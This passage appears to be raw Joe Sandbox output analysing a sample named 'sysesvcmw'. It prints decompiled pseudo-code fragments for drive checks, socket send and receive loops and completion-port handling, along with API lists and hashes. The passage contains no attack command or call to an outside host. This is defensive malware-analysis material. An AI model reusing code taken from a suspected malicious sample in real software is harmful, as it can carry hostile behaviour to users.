                                                                                                                                                                                                                                                                                    0x0040dd39
                                                                                                                                                                                                                                                                                    0x0040dd3e
                                                                                                                                                                                                                                                                                    0x0040dd42
                                                                                                                                                                                                                                                                                    0x0040dd47
                                                                                                                                                                                                                                                                                    0x0040dd4a
                                                                                                                                                                                                                                                                                    0x0040dd4c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dd50
                                                                                                                                                                                                                                                                                    0x0040dd64

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD11
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD1D
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040DD27
                                                                                                                                                                                                                                                                                      • Part of subcall function 00408C70: HeapFree.KERNEL32(00000000,00000000,00401192), ref: 00408CCB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                                                    • String ID: pdu
                                                                                                                                                                                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                                                                                                                                                                                    • Opcode ID: ec457a0ef5b77bc146b0fe158738aa773204c9d46a9fd8b8c2a6535aafe8bc7d
                                                                                                                                                                                                                                                                                    • Instruction ID: 47894c430adc079fffee70a5773b5e3dad97f275ab1eff5073097a11c037a3ac
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec457a0ef5b77bc146b0fe158738aa773204c9d46a9fd8b8c2a6535aafe8bc7d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72F0C872804210ABCB20AFA5EC84D5777785F45320304466EFD4467396CA38DC45C7B8
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404BD0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				short _v1052;
                                                                                                                                                                                                                                                                                    				intOrPtr _v1056;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = GetDriveTypeW(_a4);
                                                                                                                                                                                                                                                                                    				_v1056 = _v8;
                                                                                                                                                                                                                                                                                    				if(_v1056 >= 2) {
                                                                                                                                                                                                                                                                                    					if(_v1056 <= 3 || _v1056 == 6) {
                                                                                                                                                                                                                                                                                    						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
                                                                                                                                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x00404be3
                                                                                                                                                                                                                                                                                    0x00404be9
                                                                                                                                                                                                                                                                                    0x00404bf6
                                                                                                                                                                                                                                                                                    0x00404bff
                                                                                                                                                                                                                                                                                    0x00404c24
                                                                                                                                                                                                                                                                                    0x00404c3e
                                                                                                                                                                                                                                                                                    0x00404c3e
                                                                                                                                                                                                                                                                                    0x00404c24
                                                                                                                                                                                                                                                                                    0x00404bff
                                                                                                                                                                                                                                                                                    0x00404c4b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(00404C8F), ref: 00404BDD
                                                                                                                                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(00404C8F,?,00000208), ref: 00404C1C
                                                                                                                                                                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00404C34
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                                                    • String ID: \??\
                                                                                                                                                                                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                                                    • Opcode ID: 84def6f5971ed18c5027915d3437ea3a00eaa7db189a83ce85c670b15ed75c6e
                                                                                                                                                                                                                                                                                    • Instruction ID: 6661d798698d2c2b86e5031d8900814977fd28410c715a717113d467a9626b5b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84def6f5971ed18c5027915d3437ea3a00eaa7db189a83ce85c670b15ed75c6e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26014FB494520CEBDF64CF95CE48AD977B4AB84701F0081BAAB05A7280D6789EC5CF9C
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                                                                    			E0040DAD0(char* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				short _v28;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                                                    				char _v56;
                                                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                                                    				char* _t23;
                                                                                                                                                                                                                                                                                    				short _t26;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				short _t34;
                                                                                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                                                    				long _t47;
                                                                                                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t40 = __edx;
                                                                                                                                                                                                                                                                                    				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                                                                                                                                                                                                                    				_t34 = 0;
                                                                                                                                                                                                                                                                                    				_t43 = _a4;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					_t23 =  &_v32;
                                                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                                                    					__imp__#10( *(_t43 + 8), 0x4004667f, _t23);
                                                                                                                                                                                                                                                                                    					if(_t23 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t37 = _v44;
                                                                                                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                                                                                                    						if(_t34 == 0 || _v40 < _t37) {
                                                                                                                                                                                                                                                                                    							_v40 = _t37;
                                                                                                                                                                                                                                                                                    							_t26 = E00408B60(_t37, _t40, _t34, _t37);
                                                                                                                                                                                                                                                                                    							_t37 = _v44;
                                                                                                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                                                    							_t34 = _t26;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v30 = 0;
                                                                                                                                                                                                                                                                                    						_v26 = 0;
                                                                                                                                                                                                                                                                                    						_v22 = 0;
                                                                                                                                                                                                                                                                                    						_v18 = 0;
                                                                                                                                                                                                                                                                                    						_t29 =  *(_t43 + 8);
                                                                                                                                                                                                                                                                                    						_v32 = 0;
                                                                                                                                                                                                                                                                                    						_t40 =  &_v32;
                                                                                                                                                                                                                                                                                    						_v36 = 0x10;
                                                                                                                                                                                                                                                                                    						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);
                                                                                                                                                                                                                                                                                    						_t47 = _t29;
                                                                                                                                                                                                                                                                                    						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                                                                                                                                                                                                                    							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                                                                                                                                                                                                                    							_t40 =  &_v56;
                                                                                                                                                                                                                                                                                    							E0040D9A0(_t43, _t34, _t47, _v68,  &_v56);
                                                                                                                                                                                                                                                                                    							_t50 = _t50 + 0x14;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                                                                                                                                                                                                                    				return E00408C70(_t34);
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x0040dad0
                                                                                                                                                                                                                                                                                    0x0040dad6
                                                                                                                                                                                                                                                                                    0x0040dadb
                                                                                                                                                                                                                                                                                    0x0040dade
                                                                                                                                                                                                                                                                                    0x0040dae1
                                                                                                                                                                                                                                                                                    0x0040dae5
                                                                                                                                                                                                                                                                                    0x0040dae8
                                                                                                                                                                                                                                                                                    0x0040daf3
                                                                                                                                                                                                                                                                                    0x0040dafb
                                                                                                                                                                                                                                                                                    0x0040db04
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040db0a
                                                                                                                                                                                                                                                                                    0x0040db10
                                                                                                                                                                                                                                                                                    0x0040db18
                                                                                                                                                                                                                                                                                    0x0040db22
                                                                                                                                                                                                                                                                                    0x0040db26
                                                                                                                                                                                                                                                                                    0x0040db2b
                                                                                                                                                                                                                                                                                    0x0040db2f
                                                                                                                                                                                                                                                                                    0x0040db32
                                                                                                                                                                                                                                                                                    0x0040db32
                                                                                                                                                                                                                                                                                    0x0040db38
                                                                                                                                                                                                                                                                                    0x0040db3c
                                                                                                                                                                                                                                                                                    0x0040db40
                                                                                                                                                                                                                                                                                    0x0040db44
                                                                                                                                                                                                                                                                                    0x0040db4e
                                                                                                                                                                                                                                                                                    0x0040db51
                                                                                                                                                                                                                                                                                    0x0040db56
                                                                                                                                                                                                                                                                                    0x0040db60
                                                                                                                                                                                                                                                                                    0x0040db68
                                                                                                                                                                                                                                                                                    0x0040db6e
                                                                                                                                                                                                                                                                                    0x0040db73
                                                                                                                                                                                                                                                                                    0x0040db7e
                                                                                                                                                                                                                                                                                    0x0040db88
                                                                                                                                                                                                                                                                                    0x0040db91
                                                                                                                                                                                                                                                                                    0x0040db96
                                                                                                                                                                                                                                                                                    0x0040db96
                                                                                                                                                                                                                                                                                    0x0040db73
                                                                                                                                                                                                                                                                                    0x0040dba5
                                                                                                                                                                                                                                                                                    0x0040dbbf

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040DAFB
                                                                                                                                                                                                                                                                                    • recvfrom.WS2_32 ref: 0040DB68
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DB7E
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040DB9F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 42d21b16754e23747dafd69a251c4984d532d74facc10c73496740973b16efae
                                                                                                                                                                                                                                                                                    • Instruction ID: 93b40cc26d049a7996018c96e8ad19021b123b172151b20c2622c6b09396bf40
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42d21b16754e23747dafd69a251c4984d532d74facc10c73496740973b16efae
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33216FB1904305AFD314DF65DC84A6BB7E8EF84314F004A3EF459A2291E774A9488BAA
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                                                                    			E0040EA30(char _a4) {
                                                                                                                                                                                                                                                                                    				long _v4;
                                                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _t38;
                                                                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                                                                    				char _t51;
                                                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _t52;
                                                                                                                                                                                                                                                                                    				long* _t54;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t54 =  &_v12;
                                                                                                                                                                                                                                                                                    				_t51 = _a4;
                                                                                                                                                                                                                                                                                    				_t52 = 0;
                                                                                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                                    				_t43 = _v12;
                                                                                                                                                                                                                                                                                    				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                                                                                                                                                                                                                    				if(_t43 == 0) {
                                                                                                                                                                                                                                                                                    					return _t32;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                                                                                                    						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                                                                                                                                                                                                                    						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                                                                                                    							__imp__#111();
                                                                                                                                                                                                                                                                                    							_t52 = _t38;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_push(_t52);
                                                                                                                                                                                                                                                                                    					E0040E840(_v8, _v4, _v12);
                                                                                                                                                                                                                                                                                    					_t54 =  &(_t54[1]);
                                                                                                                                                                                                                                                                                    					_t52 = 0;
                                                                                                                                                                                                                                                                                    					_v4 = 0;
                                                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                                                    					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                                    					_t43 = _v12;
                                                                                                                                                                                                                                                                                    					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                                                                                                                                                                                                                    				} while (_t43 != 0);
                                                                                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    0x0040ea30
                                                                                                                                                                                                                                                                                    0x0040ea3c
                                                                                                                                                                                                                                                                                    0x0040ea53
                                                                                                                                                                                                                                                                                    0x0040ea57
                                                                                                                                                                                                                                                                                    0x0040ea5b
                                                                                                                                                                                                                                                                                    0x0040ea5f
                                                                                                                                                                                                                                                                                    0x0040ea63
                                                                                                                                                                                                                                                                                    0x0040ea65
                                                                                                                                                                                                                                                                                    0x0040ea6b
                                                                                                                                                                                                                                                                                    0x0040ea70
                                                                                                                                                                                                                                                                                    0x0040eaef
                                                                                                                                                                                                                                                                                    0x0040eaef
                                                                                                                                                                                                                                                                                    0x0040ea73
                                                                                                                                                                                                                                                                                    0x0040ea75
                                                                                                                                                                                                                                                                                    0x0040ea87
                                                                                                                                                                                                                                                                                    0x0040ea8f
                                                                                                                                                                                                                                                                                    0x0040ea97
                                                                                                                                                                                                                                                                                    0x0040ea99
                                                                                                                                                                                                                                                                                    0x0040ea9f
                                                                                                                                                                                                                                                                                    0x0040ea9f
                                                                                                                                                                                                                                                                                    0x0040ea97
                                                                                                                                                                                                                                                                                    0x0040eaad
                                                                                                                                                                                                                                                                                    0x0040eaae
                                                                                                                                                                                                                                                                                    0x0040eab3
                                                                                                                                                                                                                                                                                    0x0040eac9
                                                                                                                                                                                                                                                                                    0x0040eacd
                                                                                                                                                                                                                                                                                    0x0040ead1
                                                                                                                                                                                                                                                                                    0x0040ead5
                                                                                                                                                                                                                                                                                    0x0040ead9
                                                                                                                                                                                                                                                                                    0x0040eadb
                                                                                                                                                                                                                                                                                    0x0040eae1
                                                                                                                                                                                                                                                                                    0x0040eae4
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EA63
                                                                                                                                                                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040EA8F
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 0040EA99
                                                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EAD9
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                                                                                                                                                                    • Opcode ID: da4c304c9c1be7b6ec673d01c7b8ed459bae1c4d061c2b26b3558c89e2bae2e2
                                                                                                                                                                                                                                                                                    • Instruction ID: 57984d4194687ad85c3307d42481ebd1fe789462df0af38e0fad0134068e6b44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da4c304c9c1be7b6ec673d01c7b8ed459bae1c4d061c2b26b3558c89e2bae2e2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C213EB15083119BC600DF55D880D6BB7E8BFDCB64F044A2EF598A3250D734EA49CBAA
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E768
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,0040EC84), ref: 0040E770
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,0040EC84), ref: 0040E786
                                                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E7AC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c27d7355d997e997ad15a14d69b16d301b2f1f4b418a8c27a866cefb6ec18630
                                                                                                                                                                                                                                                                                    • Instruction ID: ce078963949e4c85844abf3da7583f675a37e97f6c8ed4734d1f7ba0ccbfa151
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c27d7355d997e997ad15a14d69b16d301b2f1f4b418a8c27a866cefb6ec18630
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C211AD76104305AFD310CF65EC84EEBB7ECEB88700F40492AF945D3280E679E94997B2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E5EC
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 0040E5F2
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040E608
                                                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E62A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 92b9ff23b28bc40c6e9e710034151e6c318f4b9486cff39ba22ee0894646fa3f
                                                                                                                                                                                                                                                                                    • Instruction ID: 3e3dd8552cbe75fe5ae1c554dac2643b1da2c24a2dcdc53f0862cdb527b38f0e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92b9ff23b28bc40c6e9e710034151e6c318f4b9486cff39ba22ee0894646fa3f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B40162712443056FE730CE96DC88F9B77ACEBC8711F40882AF608D61C0C7B5A9469B79
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040E280(void* __esi) {
                                                                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION* _t21;
                                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t22 = __esi;
                                                                                                                                                                                                                                                                                    				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                                                                                                                                                                                                                    				_t21 = _t23 + 0x244;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection(_t21);
                                                                                                                                                                                                                                                                                    				if(__esi == 0) {
                                                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                                                    					LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                                                                                                                                                                                                                    						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                                                                                                                                                                                                                    						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                                                                                                                                                                                                                    						if(_t13 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t19 == 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00408C70( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                                                                                                                                                                                                                    						E00408C70(_t22);
                                                                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x0040e280
                                                                                                                                                                                                                                                                                    0x0040e282
                                                                                                                                                                                                                                                                                    0x0040e287
                                                                                                                                                                                                                                                                                    0x0040e290
                                                                                                                                                                                                                                                                                    0x0040e298
                                                                                                                                                                                                                                                                                    0x0040e2e7
                                                                                                                                                                                                                                                                                    0x0040e2e8
                                                                                                                                                                                                                                                                                    0x0040e2f3
                                                                                                                                                                                                                                                                                    0x0040e29a
                                                                                                                                                                                                                                                                                    0x0040e2a8
                                                                                                                                                                                                                                                                                    0x0040e2b9
                                                                                                                                                                                                                                                                                    0x0040e2bc
                                                                                                                                                                                                                                                                                    0x0040e2c1
                                                                                                                                                                                                                                                                                    0x0040e2c3
                                                                                                                                                                                                                                                                                    0x0040e2c3
                                                                                                                                                                                                                                                                                    0x0040e2c8
                                                                                                                                                                                                                                                                                    0x0040e2cf
                                                                                                                                                                                                                                                                                    0x0040e2ca
                                                                                                                                                                                                                                                                                    0x0040e2ca
